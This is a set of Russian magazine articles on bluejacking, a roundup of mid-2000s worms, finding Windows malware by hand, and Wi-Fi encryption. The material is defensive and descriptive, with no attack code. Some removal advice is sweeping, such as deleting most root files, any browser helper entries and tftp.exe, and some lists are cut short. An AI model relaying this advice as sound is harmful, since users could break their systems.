Так что же нужно, чтобы стать блюджекером? Прежде всего обзавестись устройством, поддерживающим беспроводную передачу данных посредством Bluetooth, — это может быть КПК, коммуникатор, смартфон, мобильный телефон или, на худой конец, ноутбук. Очевидно, что КПК, коммуникатор или смартфон для качественного блюджекинга предпочтительнее мобильников и ноутбуков: малые размеры и масса в сочетании с приличным временем автономной работы позволяют практически везде носить их с собой (в отличие от ноутбуков, масса которых составляет не менее 1,5 кг, а время автономной работы едва переваливает за 4 ч.). А наличие полноценной операционной системы и встроенного в нее Проводника позволяет более широко использовать все преимущества технологии Bluetooth. Хотя стоит отметить, что в последнее время мобильные телефоны благодаря приложениям, написанным на Java, вышли практически на такой же уровень программного оснащения, что и их старшие братья смартфоны и коммуникаторы. Далеко не последним фактором при выборе является и цена устройства, правда, сейчас самый «навороченный» КПК или коммуникатор по стоимости догоняют ноутбук начального уровня.
Первые шаги
Итак, с устройством определились, что же дальше? Первым делом необходимо идентифицировать себя в огромном количестве блюджекеров. Для этого по аналогии с интернетовскими чатами нужно придумать «никнейм» и дать имя своему устройству. Это можно сделать в разделе настроек Bluetooth. Обозвали — все, добро пожаловать в блюджекеры. Что теперь? Выбираем место для блюджекинга: это может быть магазин, кинотеатр, развлекательный комплекс — все что угодно, главное, чтобы народу было побольше, тогда и шансы найти «жертву» выше. Включаем Bluetooth и начинаем сканировать местность на предмет устройств с включенным «голубым зубом» (они и будут нашими потенциальными «жертвами»). Нашли? Отлично. Создаем контакт-сообщение, отсылаем по Bluetooth и внимательно смотрим по сторонам: кто его получит и какая за этим последует реакция.
Правила хорошего тона
Перед тем как влиться в стройные ряды блюджекеров, необходимо запомнить несколько простых правил поведения в приличном обществе:
сообщения не должны содержать оскорбительной информации; если адресат не отвечает на ваши «приставания», от дальнейших попыток пообщаться лучше отказаться; все ваши действия не должны быть направлены на выявление «дыр» в системе безопасности устройств и последующего их использования в целях захвата, искажения, удаления информации.
Настоятельно рекомендую соблюдать все вышеперечисленное, дабы не порочить доброе имя блюджекеров.
Скрытая угроза
Помимо общения и развлечения блюджекеров может подстерегать и опасность. Нет, злобные хакеры пока еще не успели написать страшные вирусы, способные в один миг погубить вашего электронного помощника. Однако активно общаясь по протоколу Bluetooth, вы рискуете информацией, хранящейся на вашем устройстве. В первую очередь эта опасность угрожает хозяевам простеньких мобильников, и исходит она со стороны владельцев устройств более сложного класса — КПК, смартфонов и ноутбуков. Последние, обладая хорошим Проводником, позволяют просматривать каталоги мобильных телефонов и без всяких проблем копировать или удалять содержащуюся в них информацию, а также использовать мобильники в качестве модема и шлюза для выхода в Интернет. Конечно, в большинстве современных устройств, оснащенных Bluetooth, для подключения нужно пройти процесс авторизации, без чего получить доступ к недрам телефона невозможно (рекомендуется провести соответствующие настройки). Но если вы намерены общаться и обмениваться информацией и допустили до своего устройства всех желающих, потом не жалуйтесь и не говорите, что вас не предупреждали. КПК в этом плане защищены лучше, к тому же для них уже начинают появляться различные забавные программы, позволяющие активно общаться, не допуская посторонних к внутренним информационным ресурсам, и предотвращающие хакерские нападения.
Авторизация проходит следующим образом. При попытке установить соединение с устройством на экран выдается сообщение с предложением ввести код (несколько цифр). Такое же сообщение выводится на экране второго устройства, с которым вы попытаетесь соединиться. Коды на сопрягаемых устройствах должны совпадать, в противном случае авторизация не состоится. У блюджекеров принят универсальный код авторизации «0000», так что если вы попытались отправить кому-то сообщение и в ответ на ваш запрос потребуют ввести код, то не отчаивайтесь, быть может, это просто осторожный блюджекер, рассчитывающий на опытных в этом деле сообщников. Если авторизация все-таки не прошла, стало быть, с вами не хотят общаться или оппонент просто не знает универсального кода. Как я уже говорил, авторизация необходима для обмена данными или синхронизации, а при отправке сообщений-контактов («блюджек») можно обойтись и без нее, правда, не всегда. В общем, дерзайте, но помните: у кого-то могут оказаться зубки и поострее ваших.
Более подробно узнать о блюджекерах и вступить в их ряды можно, посетив официальную страницу в Интернете: http://www.bluejack.ru/
Вирусные войны
Автор: Андрей АСФУРА
Тысячи различных вирусов путешествуют по Сети, норовя проникнуть в недра жесткого диска персонального компьютера. Одни воруют конфиденциальную информацию, другие открывают доступ злоумышленникам, третьи превращают компьютер в proxy-сервер. Несмотря на то, что целей создания виртуальной живности с каждым годом становится все больше, способы ее распространения уже на протяжении нескольких лет практически неизменны. Самыми эффективными по-прежнему остаются распространение посредством электронной почты (хотя социальной инженерией сейчас уже никого не удивишь) и поиск IP-адресов с дальнейшим открытием TCP-портов (при этом эксплуатируются одна или несколько брешей в операционных системах). Несомненно, наиболее перспективен для авторов вирусов вариант «два в одном»: первым способом можно рассчитывать на наивность владельцев машин, вторым — на их некомпетентность.
Одним из таких универсальных вирусов является Mytob.ch. Червь приходит на почтовый ящик под одним из нескольких имен, произвольно выбранными темами письма и его содержаниями. Благодаря уязвимости Plug and Play Service Vulnerability вирус также может проникнуть на машину через TCP-порт 8888, сохранив себя под именами haha.exe или lol.exe. Правда, такое заражение может произойти только с компьютером, работающим под операционной системой Windows 2000. После внедрения в систему Mytob.ch копирует себя в системный каталог Windows под названием per.exe, регистрируется в ключе автозапуска реестра, а также создает идентификатор «B-O-T-Z-O-R» для определения своего присутствия в системе. Впоследствии он открывает TCP-порт, соединяясь с IRC-каналами для получения дальнейших инструкций от своего создателя. Вирус также блокирует доступ к ряду антивирусных и других онлайн-ресурсов.
Из того же семейства червь Mytob.r. Распространяется вирус, эксплуатируя уязвимости DCOM RPС и LSASS. Кроме того, он также способен попасть в компьютер посредством вложений в электронных сообщениях. После запуска Mytob.r копирует себя в системный каталог Windows с именем msnmsgs.exe, регистрируется в реестре, внедряет в систему своего предшественника — вирус Mytob.n. Червь способен принимать посредством IRC-каналов команды от своего создателя. Помимо этого, он блокирует доступ к ресурсам антивирусных разработчиков.
Червь Lebreat.m ничем не уступает своим коллегам. Попадает он на компьютер через вложения в электронных письмах, посредством пиринговых сетей, а также при помощи уязвимостей Plug and Play Service Vulnerability и LSASS. Имя отправителя сообщения — root или webmaster. В тексте письма содержится просьба загрузить файл, расширение которого (.exe) не вызывает доверия. После запуска вирус сохраняет себя в системном каталоге Windows (файлы winhost.exe и winhost.tmp), вносит изменения в реестр, а также создает две другие вредоносные программы — Bagle.bw и Lebreat.i. Помимо этого, червь делает невозможным обращения к сайтам некоторых компаний, специализирующихся на вопросах компьютерной безопасности. Он также может загружать и запускать файлы из Сети.
Троянская программа Lager.r позволяет использовать зараженную машину в качестве proxy-сервера. После проникновения в систему троян создает в системном каталоге Windows файл win32.exe. После этого он регистрируется в системном реестре, чем обеспечивает себе автоматический запуск при каждой новой загрузке операционной системы. Lager.r открывает на инфицированном компьютере произвольный TCP-порт. В дальнейшем злоумышленник способен работать во Всемирной паутине от имени удаленной машины. Троян периодически подключается к удаленному серверу, отправляя сведения о компьютере и загружая новые обновления.
Многие месяцы не стихает борьба между различными группами создателей вирусов. Их цель — полностью контролировать вирусный трафик, вытеснив конкурентов на задворки компьютерного андеграунда. Первое время войну между собой вели авторы NetSky и создатели семейств Mydoom и Bagle. И, судя по всему, она завершилась: лавры победителя примерил червь NetSky со своими многочисленными модификациями. Однако за одним конфликтом последовал другой: теперь уже в открытое противостояние с NetSky вступил Mytob, для написания которого использовались исходные коды червя Mydoom. Новый вирус оказался достойным продолжателем традиций, показав впечатляющие результаты и опередив NetSky по всем показателям. 13 позиций в вирусной двадцатке, составленной Лабораторией Касперского, принадлежат семейству Mytob, тогда как NetSky может похвастаться только 4 рейтинговыми местами.
Около 40 % процентов случаев заражения за прошедший месяц произошло с участием сетевых вирусов Mytob, за 20 % инцидентов ответственны черви NetSky. Появление в июле в строчках вирусного хит-парада семейств Zafi, Bagle, Mydoom оказалось временным, и в августе об их существовании мало что напоминало. Исключениями являются только две версии Zafi (Zafi.b и Zaf.d), сохранившие свои позиции в первой пятерке. Неплохие показатели имеет червь LovGate.w, поднявшийся на 7-е место. Около 20 % от всего вирусного трафика занимают прочие вредоносные программы, что говорит о многообразии существующих на сегодняшний момент виртуальных паразитов.
Целый месяц пользователи браузера Internet Explorer будут теоретически уязвимы для атак злоумышленников. Несколько серьезных уязвимостей, которые могут представлять реальную опасность, так и останутся без внимания со стороны руководства софтверного гиганта. В официальном релизе говорилось, что новая серия патчей будет доступна для пользователей уже 13 сентября. Однако планы изменились: теперь набор заплаток увидит свет только 11 октября. По заявлению представителей компании, такой шаг объясняется резко возникшими трудностями. Уязвимости, которые должен был исправить новый патч, касались преимущественно программы Internet Explorer. Одна из дыр, охарактеризованная как критически опасная, позволяет проникать в компьютер посредством сформированной особым образом страницы.
Поиск и удаление вирусов вручную
Автор: Shturmovik
Предисловие
Пока что я не знаю никого, кто бы прямо или косвенно не пострадал от действий компьютерных вирусов. Антивирусные компании много хотят за свои продукты, которые так и не обеспечивают надлежащей защиты. Спрашивается, зачем вообще тогда покупать антивирусное ПО? Все что создано человеком может быть уничтожено, это относится как к антивирусам, так и к вирусам. Человека обмануть намного сложнее, чем программу. Поэтому эта статья посвящена описанию методики обнаружения и деактивации вирусного программного обеспечения без антивирусного продукта.
Запомните есть только одна вещь, ценность которую невозможно обойти/сломать/обмануть — это Знание, собственное понимание процесса. Сегодня я расскажу на реальных примерах как обнаружить и поймать у себя на компьютере Интернет-червей и шпионское ПО. Конечно есть еще много видов, но я взял самые распространенные и решил написать про то, что было у меня на практике, дабы не сказать чего лишнего. Если повезет в поиске расскажу про макро-вирусы, бэкдоры и руткиты. Итак перед тем как приступись, отмечу, в данной статье рассматриваю только операционную систему семейства NT, подключенную к интернету. У меня самого стоит Win2000 SP4, вирусы ловлю на WinXP PE. Итак перейдем к беглому, а затем и детальному анализу системы на предмет червей и шпионов. Беглым осмотром мы просто обнаружаем наличие программы и локализуем ее, детальный анализ уже идет на уровне файла и процессов. Там я расскажу о прекрасной программе PETools, впрочем всему свое время.
Анализ системы
Логично, что для того чтобы обнаружить и обезвредить вредоносную программу необходимо существование таковой программы. Профилактика остается профилактикой, о ней поговорим позже, однако надо первым делом определить есть ли на компьютере вообще вирусы. Для каждого типа вредоносных программ соответственно есть свои симптомы, которые иногда видны невооруженным глазом, иногда незаметны вовсе. Давайте посмотрим, какие вообще бывают симптомы заражения. Поскольку мы ведем речь о компьютере, подключенном к глобальной сети, то первым симптомом является чрезмерно быстрый расход, как правило, исходящего трафика, это обуславливается тем, что очень многие интернет-черви выполняют функции DDoS-машин или просто ботов. Как известно, при DDoS атаке величина исходящего трафика равна максимальной величине трафика за единицу времени.
Конечно, на гигабитном канале это может быть и не так заметно если проводится DdoS атака шириной с диалап соединение, но как правило бросается в глаза заторможенность системы при открытии интернет ресурсов (Еще хотелось бы отметить, что речь пойдет о вирусах, которые хоть как то скрывают себя системе, ведь не надо объяснять ничего если у вас в папке Автозагрузка лежит файл kfgsklgf.exe который ловится фаерволлом и т. д.). следующее по списку, это невозможность зайти на многие сайты антивирусных компаний, сбои в работе платных программ типа CRC-error, это уже обусловлено тем, что достаточно многие коммерческие протекторы поддерживают функцию проверки четности или же целости исполняемого файла (и не только протекторы, но и сами разработчики защит), что сделано для защиты программы от взлома. Не будем говорить об эффективности данного метода против крякеров и реверсеров, однако сигнализацией к вирусному заражению это может сработать идеально. Плата начинающих вирмейкеров за не убиваемые процессы, то что при выключении или перезагрузке компьютера идет длительное завершение какого нибудь-процесса, или же вообще компьютер зависает при завершении работы.
Думаю про процессы говорить не надо, а так же про папку автозагрузка, если там есть что-то непонятное или новое, то, возможно, это вирус, однако про это попозже. Частая перезагрузка компьютера, вылет из интеренета, завершение антивирусных программ, недоступность сервера обновления системы microsoft, недоступность сайтов антивирусных компаний, ошибки при обновлении антивируса, ошибки вызванные изменением структуры платных программ, сообщение windows, что исполняемые файлы повреждены, появление неизвестных файлов в корневом каталоге, это лишь краткий перечень симптомов зараженной машины.
Помимо прямых вредоносных программ существует так называемое шпионской программное обеспечение, это всевозможные кейлоггеры, дамперы электронных ключей, нежелательные «помощники» к браузеру. Честно говоря, по методу обнаружения их можно разделить на два противоположных лагеря. Допустим кейлоггер, присоединенный динамической библиотекой к оболочке операционной системы обнаружить на лету крайне сложно, и наоборот, невесть откуда взявшийся помощник (плагин, строка поиска и т. д.) к internet Explorer’у (как правило) бросается в глаза сразу же. Итак, я думаю, настало время оставить эту пессимистическую ноту и перейти к реалистичной практике обнаружения и деактивации вредоносного программного обеспечения.
Обнаружение на лету
Первым делом мы научимся обнаруживать и уничтожать интернет-черви. Про почтовые черви я рассказывать не буду, алгоритм он один для всех, однако метод распространения почтовых червей настолько банален, что если вы умудрились запустить файл из аттача, то эта статья вам не поможет все равно. Для наглядности приведу пример из жизни, как обнаружил недектируемый ни одним антивирусом (до сих пор) IRC-bot, на уязвимой машине. Принцип распространения таких червей довольно прост, через найденную уязвимость в операционной системе. Если подумать головой то можно понять, что основным способом забросить себя на уязвимую машину является вызов ftp-сервера на этой машине. По статистике уязвимостей это печально известный tftp.exe (который, кстати, я не разу не использовал и думаю, что и создан он был только для вирусописателей). Первый симптом таких червей это исходящий трафик и не только из-за DDoS атак, просто вирус, попадая на машину, начинает поиск другой уязвимой машины в сети, то есть попросту сканирует диапазоны IP-адресов. Далее все очень просто, первым делом смотрим логи в журнале событий ОС, что находится по адресу Панель управления->Администрирование->Журнал событий.
Нас интересуют уведомления о запущенных службах и главное уведомления об ошибках. Уже как два года черви лезут через ошибку в DCOM сервере, поэтому любая ошибка, связанная с этим сервером уже есть повод полагать о наличие вируса в системе. Чтобы точно убедится в наличии последнего, в отчете об ошибке надо посмотреть имя и права пользователя допустившего ошибку. Если на этом месте стоит «пользователь неопределен» или что-то подобное то радуйтесь, вы заражены! и вам придется читать дальше. Я именно так и обнаружил своего первого вируса на специальной сборочной машине (просто компьютер подключенный к сети с win2000, безо всяких пакетов обновление, экранов и т. д. специально для сбора таких программ =)). Если действовать по логике, а не по инстинкту, то первым делом вы должны закрыть дыру в системе для последующих проникновений, а потом уже локализовывать вирусы. Как я уже говорил, такие вирусы обычно лезут через tftp.exe, поэтому (если он вам действительно не нужен! если никогда его не видели, значит, не нужен) просто удаляем его из системы. Для этого сначала удаляем его из архива
затем из папок обновления ОС, если таковые имеются, после этого из %WINDIR%\system32\dllcache\ и уже потом просто из
Возможно, ОС скажет, что файлы повреждены и попросит диск с дистрибутивом, не соглашайтесь! А не то он восстановится и опять будет открыта дыра. Когда вы проделаете этот шаг можно приступать к локализации вируса. Посмотреть какие приложения используют сетевое подключение, помогает маленькая удобная программа TCPView, однако некоторые черви имеют хороший алгоритм шифрации или хуже того, прикрепляются к процессам либо маскируются под процессы.
Самый распространенный процесс для маскировки — это, несомненно, служба svhost.exe, в диспетчере задач таких процессов несколько, а что самое поразительное, можно создать программу с таким же именем и тогда отличить, кто есть кто практически невозможно. Но шанс есть и зависит от внимательности. Первым делом посмотрите в диспетчере задач (а лучше в программе Process Explorer) разработчика программ. У svhost.exe это как не странно M$, конечно можно добавить подложную информацию и в код вируса, однако тут есть пара нюансов. Первый и наверное главный состоит в том, что хорошо написанный вирус не содержит не таблицы импорта, не секций данных. Поэтому ресурсов у такого файла нет, а, следовательно, записать в ресурсы создателя нельзя. Либо можно создать ресурс, однако тогда появится лишний объем файла, что крайне нежелательно вирмейкеру.
Еще надо сказать про svhost.exe, это набор системных служб и каждая служба — это запущенный файл с определенными параметрами. Соответственно в Панели управления — > Администрирование — > Службы, содержатся все загружаемые службы svhost.exe, советую подсчитать количество работающих служб и процессов svhost.exe, если не сходиться, то уже все понятно (только не забудьте сравнивать количество РАБОТАЮЩИХ служб). Подробнее в приложении А.
Надо так же отметить, что возможно и среди служб есть вирус, на это могу сказать одно, список служб есть и на MSDN и еще много где в сети, так что просто взять и сравнить проблемы не составит. После таких вот действий вы сможете получить имя файла, который возможно является вирусом. О том, как определять непосредственно вирус или нет, я расскажу чуть дальше, а сейчас оторвемся от рассуждений и посмотрим еще несколько моментов. Как вы, наверное, уже знаете, для нормальной работы ОС необходимо всего 5 файлов в корневом каталоге, поэтому все остальные файлы вы можете смело удалять, если конечно вы не умудряетесь ставить программы в корневой каталог. Кстати файлы для нормальной работы, вот они: ntldr
Больше ничего быть не должно. Если есть и вы не знаете, откуда оно там появилось то переходите к главе [Детальный анализ].Приаттачивание к процессам мы так же рассмотрим в главе [детальный анализ], а сейчас поговорим про автозапуск. Естественно вирус должен как-то загружаться при старте системы, как правило. Соответственно смотрим следующие ключи реестра на предмет подозрительных программ. (А если вы уже нашли вирус, то ищите имя файла везде в реестре и удаляйте):
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
Это все было сказано про детектирование простых червей. Конечно, вычислить хороший скрытый вирус сложно. Обнаружение этого червя и его деативация заняли у меня около 10 минут времени, конечно, я знал, где искать, это упростило задачу. Однако допустим на обнаружение хорошего бэкдора, кейлоггера, стелс-вируса, или же просто вируса, в котором используется перехват вызовов API-функций файловой системы (тогда вирус получается действительно невидимым), потокового вируса, в общем, есть еще ряд нюансов, однако таких творений действительно мало, мало настоящих вирмейкеров в наши дни. Огорчает… Постараюсь рассказать о них в следующих статьях. теперь перейдем к шпионским программам, или, как их называют буржуи SpyWare. Объяснять буду опять же на примерах шпионов, которых я ловил сам лично, чтобы мои слова не казались пустой фантазией.
Начну я свой рассказ с самых распространенных шпионов. В одном небезызвестном журнале один хороший программист правильно назвал их блохами ослика. Простейший шпион очень часто скрывается за невинным на вид тулбаром. Знайте, что если у вас, вдруг, откуда не возьмись, появилась новая кнопка или же строка поиска в браузере то считайте, что за вами следят. Уж очень отчетливо видно, если у вас вдруг изменилась стартовая страница браузера, тут уж и говорить нечего. Конечно, прошу простить меня за некоторую некорректность в терминах. Вирусы, меняющие стартовые страницы в браузере вовсе не обязательно будут шпионами, однако, как правило, это так и поэтому позвольте здесь в этой статье отнести их к шпионам. рассмотрим пример из жизни, когда я пришел на работу и увидел на одном компьютере странного вида строку поиска в браузере, на мой вопрос откуда она взялась я так ничего и не получил. пришлось разбираться самому.
Как вообще может пролезть шпион в систему? Есть несколько методов, как вы уже заметили речь идет про Internet Explorer, дело в том, что самый распространенный метод проникновения вируса в систему через браузер — это именно посредством использования технологии ActiveX, саму технологию уже достаточно описали и зацикливаться я на ее рассмотрении не буду. Так же заменить стартовую страницу, к примеру, можно простым Java-скриптом, расположенным на странице, тем же javascript можно даже закачивать файлы и выполнять их на уязвимой системе. Банальный запуск программы якобы для просмотра картинок с платных сайтов известного направления в 98 % случаев содержат вредоносное ПО. Для того чтобы знать, где искать скажу, что существует три наиболее распространенных способа, как шпионы располагаются и работают на машине жертвы.
Первый — это реестр и ничего более, вирус может сидеть в автозагрузке, а может и вообще не присутствовать на компьютере, но цель у него одна — это заменить через реестр стартовую страницу браузера. В случае если вирус или же скрипт всего лишь однажды заменил стартовую страницу, вопросов нет, всего лишь надо очистить этот ключ в реесре, если же после очищения, через некоторое время ключ снова появляется, то вирус запущен и постоянно производит обращение к реестру. Если вы имеете опыт работы с отладчиками типа SoftIce то можете поставить точку останова на доступ к реестру (bpx RegSetValueA, bpx RegSetValueExA) и проследить, какая программа, кроме стандартных, производит обращении к реестру. Дальше по логике уже. Второй — это именно перехватчики системных событий, так назваемые хуки. Как правило, хуки используются больше в кейлоггерах, и представляют собой библиотеку, которая отслеживает и по возможности изменяет системные сообщения. Обычно есть уже сама программа и прикрепленная к ней библиотека, поэтому исследуя главный модуль программы вы ничего интересного не получите.
Подробнее об этом и следующем способе смотрите ниже в главе детальный анализ.
И, наконец, третий способ это прикрепление своей библиотеки к стандартным программам ОС, таким как explorer.exe и iexplorer.exe, проще говоря написание плагинов к этим программам. Тут опять же есть пара способов, это прикрепление с помощью BHO (об самом способе прикрепления писал Gorlum, пользуясь случаем привет ему и почет) и просто внедрение своей библиотеки в исполняемый файл. разница, какой понимаю ее я в том что Browser Helper Object описано и предложено самой корпорацией M$, и используется как плагин к браузеру, а внедрение библиотек — это уже не столько плагин, сколько как самодостаточная программа, больше напоминающая файловый вирус прошлых лет.
Предоставлю вам для общего обучения ключи реестра, куда могут прописаться недоброкачественные товары, в виде тулбаров, кнопок и стартовых страниц браузера.
Стартовая страница
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main параметр StartPage.
HKEY_USERS\S-1-5-21-….\Software\Microsoft\Internet Explorer\Main параметр StartPage (S-1-5-21-…. этот ключ может быть разный на разных машинах)
Регистрирование объектов типа кнопок, тулбаров и т. д.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Browser Helper Objects\
Вот тут регистрируется все «помошники» и если у вас таковых нет то ключ должен быть пуст, если не пуст, то удаляйте.
Итак, если у вас не все в порядке с этими ключами, и вы хотите разобраться дальше, то смотрим дальше.
Ищем получше
Поскольку к моменту написания данной статью я хотел сделать ее понятной всем, то эта глава может и показаться некоторым людям непонятной, но я старался упростить все как мог. Я не буду объяснять вас архитектуру PE-файла, хотя мы будем к ней обращатся. Подробнее есть множество мануалов в сети, а про PE-файлы хорошо было написано Iczelion’ом. Может быть, когда ни будь, да опишу тоже.
Итак, приступая к детальному анализу нам потребуются некоторые инструменты, я использую в этом случае и советую использовать PETools by NEOx и PEiD (Можно вообще обойтись одним Soft Ice’ом, но лучше побольше инструментов да попроще, для реверсеров отмечу, что сейчас пойдет речь о просмотре таблицы импорта и упакованности файла, поэтому пропустите мимо ушей то извращение, которое вы сейчас увдите)
Значит, как я уже говорил, был такой случай, что в браузере появилась непонятно откуда строка поиска и стартовая страница. Проверив реестр, я не нашел изменения статовой страницы, а так же не нашел регистрации плагинов в браузере. При детальном осмотре оказалась, что данная строка поиска (тулбар проще) появляется во всех окнах ОС. Это уже немного меняло суть дела. Я предположил, что занимаются этим два независимых друг от друга шпиона и именно методом внедрения динамической библиотеки. При этом надо различать, что если тулбар был бы только в браузере, значит, внедрился он в процесс iexplorer.exe, но у нас был он везде, следовательно, проверять надо было в explorer.exe. Я начал проерять браузер. Для этого я запустил PETools и просто посмотрел, какие библиотеки использует браузер. Мне подвернулась удача в лице нерадивого вирмейкера, на фоне системных библиотек из %SYSTEMROOT% красовалась некая smt.dll с путем, уходящем, куда то в TEMP. Перезагрузка в безопасном режиме и удаление этой библиотеки, и все в норме, шпион убит. Осталось только опять вызвать PETools, кликнуть правой кнопкой мыши на нашем процессе и произвести пересборку файла. Это самый простой случай в моей практике. Перейдем к следующему, находим и убиваем тулбар. Тем же образом я посмотрел процесс explorer.exe и ничего бросающегося в глаза, не нашел. Из этого следует два варианта, либо я не знаю наизусть всех библиотек, и тулбар затерялся среди них, либо мне не дано по знаниям его обнаружить. К счастью вышло первое.
Но как же тогда отличить настоящую библиотеку от подложной. я скажу, а вы уже поймете сами. Как известно вирмейкеры гонятся за минимализацией и зашифрованостью кода. То есть не один тулбар как правило не будет лежать в открытом виде, во-первых код можно уменьшить, а значит нужно, и во-вторых если кто нибудь (чаще даже не антивирус, а конкурент) обнаружит данную библиотеку то ему незашифрованный код легче понять. Поэтому берем PEiD и производим массовое сканирование импортируемых библиотек. Библиотеки от microsoft естественно написаны на visual C++ и ничем не упакованы, поэтому если мы видим (а я как раз увидел подозрительную seUpd.dll упакованную UPX) упакованную или зашифрованную библиотеку то 99 % это, то, что мы искали. Проверит она это или нет очень просто, переместите в безопасном режиме ее и посмотрите результат. Конечно, можно было бы распаковать, посмотреть дизасм листинг и подумать, что же она делает, но не бдем в то углубляться. Если вы не нашли все-таки упакованную библиотеку, то полезно редактором ресурсов типа Restorator посмотреть версии файла, как я уже говорил у всех библиотек от M$ там так и написано. Вот на таких делах прокалываются вирмейкеры. Стыдно должно быть им вообще писать такие вирусы.
На последок хочу еще заметить, что библиотека *.dll не обязательно может внедрятся в процессы. В ОС Windows есть такое полезное приложение, как rundll32.exe, и я могу запускать с помощью этого процесса любую библиотеку. И при этом не обязательно в автозагрузке писать rundll32.exe myspy.dll, достаточно прописать это внутри зараженного файла. Тогда вы будете видеть только свои (зараженные файлы, которые маловероятно будут детектироваться антивирусом) и процесс rundll32.exe, и больше ничего. Как быть в таких случаях? Здесь уже придется углубляться в структуру файла и ОС, поэтому оставим это за рамками данной статьи. Насчет упакованности/зашифрованности вируса относится не только к библиотекам, но и ко всем системным файлам.
На этой приятной ноте я хочу закончить главную часть статьи, написано было много, однако это только 1 % всех способов обнаружения. Мой способ пускай и не лучший, но я им пользуюсь сам и довольно продуктивно (хорошо только не на своем компьютере). По возможности если получится, напишу продолжение про макро-вирусы, кейлоггеры и бэкдоры, словом про то, что я уже ловил.
Благодарности
Хотелось бы высказать благодарности всем с кем я общаюсь за то, что они есть.
А так же людям, кто оказал на меня влияние и хоть как нибудь направил на путь истинный меня:
1dt.w0lf, MozgC, Mario555, c0Un2_z3r0, _4k_, foster, etc.
Приложение А
Список системных служб svhost.exe (WinXP)
DHCP-клиентsvchost.exe — k netsvcs
DNS-клиент svchost.exe — k NetworkService
Автоматическое обновление svchost.exe — k netsvcs
Вторичный вход в систему svchost.exe — k netsvcs
Диспетчер логических дисков svchost.exe — k netsvcs
Запуск серверных процессов DCOM svchost — k DcomLaunch
Инструментарий управления Windows svchost.exe — k netsvcs
Клиент отслеживания изменившихся связей svchost.exe — k netsvcs
Модуль поддержки NetBIOS через TCP/IP svchost.exe — k LocalService
Обозреватель компьютеров svchost.exe — k netsvcs
Определение оборудования оболочки svchost.exe — k netsvcs
Рабочая станция svchost.exe — k netsvcs
Сервер svchost.exe — k netsvcs
Служба восстановления системы svchost.exe — k netsvcs
Служба времени Windows svchost.exe — k netsvcs
Служба регистрации ошибок svchost.exe — k netsvcs
Службы криптографии svchost.exe — k netsvcs
Справка и поддержка svchost.exe — k netsvcs
Темы svchost.exe — k netsvcs
Уведомление о системных событиях svchost.exe — k netsvcs
Удаленный вызов процедур (RPC) svchost — k rpcss
Центр обеспечения безопасности svchost.exe — k netsvcs
Диспетчер авто-подключений удаленного доступа svchost.exe — k netsvcs
Протокол HTTP SSLsvchost.exe — k HTTPFilter
Расширения драйверов WMI svchost.exe — k netsvcs
Служба загрузки изображений (WIA)svchost.exe — k imgsvc
Служба обеспечения сетиsvchost.exe — k netsvcs
Служба серийных номеров переносных устройств мультимедиа
svchost.exe — k netsvcs
Совместимость быстрого переключения пользователей
svchost.exe — k netsvcs
Съемные ЗУsvchost.exe — k netsvcs
Узел универсальных PnP-устройствsvchost.exe — k LocalService
Управление приложениямиsvchost.exe — k netsvcs
Фоновая интеллектуальная служба передачиsvchost.exe — k netsvcs
Диспетчер подключений удаленного доступаsvchost.exe — k netsvcs
Сетевые подключенияsvchost.exe — k netsvcs
Система событий COM+svchost.exe — k netsvcs
Служба обнаружения SSDP svchost.exe — k LocalService
Служба сетевого расположения (NLA)svchost.exe — k netsvcs
Службы терминаловsvchost — k DComLaunch
Телефонияsvchost.exe — k netsvcs
Windows Audiosvchost.exe — k netsvcs
Доступ к HID-устройствамsvchost.exe — k netsvcs
Маршрутизация и удаленный доступsvchost.exe — k netsvcs
Оповещатель svchost.exe — k LocalService
Планировщик заданийsvchost.exe — k netsvcs
Служба сообщений svchost.exe — k netsvcs
Итого шесть процессов при работе всех служб
Защита Wi-Fi сетей. Методы защиты
Автор: securityfocus
Исправляем WEP
Существует несколько процедур, при помощи которых вы можете улучшить безопасность своей сети. На самом деле все ниже перечисленные пункты необходимы на этапе становления сети, но если у вас они не реализованы, то лучше их сделать — чем быстрее тем лучше.
Используйте длинные WEP ключи, это затруднит хакеру работу. Если оборудование поддерживает 128-битное шифрование, то конечно юзайте его. Периодически меняйте ключи. Размещайте точки доступа за файрволом, вне локальной сети. Используйте VPN для всех протоколов, которые могут передавать важную информацию. Используйте несколько техник для шифрования трафика, например IPSec. Вероятно надо будет устанавливать софт на клиентах, установить IPSec сервер в локальной сети, использовать VLAN между точкой доступа и сервером. В таком варианте пользователи сети будут организовывать IPSec туннель к серверу и передавать через него все данные.
Если есть возможность, то нужно менять прошивки на всех сетевых устройствах. Например, разработчики AirSnort (см. предыдущую статью) отмечают, что уже не все точки доступа поддаются взлому и на них невозможно взломать WEP ключ. Это работа производителей — обновления постоянно улучшают свои устройства и чем быстрее вы внедрите эти улучшения в свою сеть тем лучше.
Но это конечно не панацея. WEP использует алгоритм RC-4, который по определению уязвим из-за постоянства ключа. Единственное, что в протоколе помогает бороться с этим и изменять значение ключа — 16-битное значение IV. Оно каждые 65.536 пакетов меняет свое значение, и с точки зрения хакера уже не важно какая прошивка используется в сетевом оборудовании — если значение повторяется, следовательно его можно подобрать и проникнуть внутрь. Апгрейд оборудования не стоит игнорировать, но лучше обратить внимание и на сами алгоритмы защиты сети.
WPA-PSK и WPA-Enterprise
Следовательно, надо что-либо делать с самой концепцией. Решения уже разработаны, в частности WPA, или Wi-Fi Protected Access. Основа WPA — Temporal Key Integrity Protocol (TKIP). Вкратце, TKIP намного превосходит WEP: механизм шифрования его более стойкий, к тому же его можно внедрить на существующем оборудовании. TKIP меняет ключ для каждого передаваемого пакета и тем самым устраняет любую возможность подбора. (Существует и облегченная версия WPA — WPA Pre-Shared Key (WPA-PSK). Она больше подходит для небольших сетей. В ней как и в WEP существует статический ключ, но используется и TKIP, автоматически меняющий ключ в определенных временных интервалах.) Другая вариация WPA — WPA-Enterprise, использующая TKIP, а плюс к этому аутентифицирующий сервер или устройство, которое работает по Extensible Authentication Protocol (обратите внимание, что тут необходим дополнительный сервер, который будет раздавать привилегии, например RADIUS, такую ситуацию называют EAP-over-RADIUS; есть и иное, более дешевое решение — так называемый Wireless Guard, он авторизует пользователя именем и паролем).
